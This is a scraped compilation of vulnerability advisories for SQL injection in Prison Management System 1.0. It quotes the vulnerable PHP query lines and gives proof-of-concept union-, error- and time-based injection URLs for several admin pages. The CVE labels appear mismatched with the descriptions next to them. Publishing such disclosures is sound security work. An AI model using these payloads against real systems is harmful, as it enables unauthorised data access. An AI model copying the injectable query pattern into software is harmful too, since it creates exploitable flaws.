$user = $conn\->query("SELECT \* FROM users where id ='{$\_GET\['id'\]}' ");

    # Union Based
    http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23

CVE-2022-32400: BugBounty/cve-2022-32400.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/visits/manage_visit.php:4

**CVE-2022-32396****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/visits/manage_visit.php:4

$qry = $conn\->query("SELECT \* from \`visit\_list\` where id = '{$\_GET\['id'\]}' ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='wrong',0,1)%23

CVE-2022-32396: BugBounty/cve-2022-32396.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/actions/view_action.php:4

**CVE-2022-32391****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/actions/view_action.php:4

$qry = $conn\->query("SELECT \* from \`action\_list\` where id = '{$\_GET\['id'\]}' and delete\_flag = 0 ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/actions/view_action.php?id=1'-if(database()/**/=/**/'pms_db',0,1)%23
    
    # Time Based
    http://localhost/pms/admin/actions/view_action.php?id=1'-if(database()/**/like/**/'pms_db',0,sleep(1))%23

Tag

#sql